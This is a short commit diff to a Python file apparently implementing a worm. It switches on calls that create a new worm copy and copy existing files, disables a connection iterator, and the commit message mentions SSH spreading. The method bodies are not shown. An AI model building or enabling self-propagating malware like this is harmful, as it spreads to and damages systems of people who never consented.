Updated worm with more worm per worm, finished SSH for now

--- a/Worm v.1
+++ b/Worm v.1
@@ -141,14 +141,12 @@ class Worm:
     def start_worm_actions(self):
         self.list_directories(self.path)
         print(self.target_dir_list)
-        #self.create_new_worm()
-        #self.copy_existing_files()
-        self.connection_iterator()
+        self.create_new_worm()
+        self.copy_existing_files()
+        #self.connection_iterator()
     
 if __name__=="__main__":
     current_directory = os.path.abspath("")
     worm = Worm(path=current_directory)
     worm.start_worm_actions()
     
-    
-""" IPV4: 192.168.1.26  Subnet Mask: 255.255.255.0"""
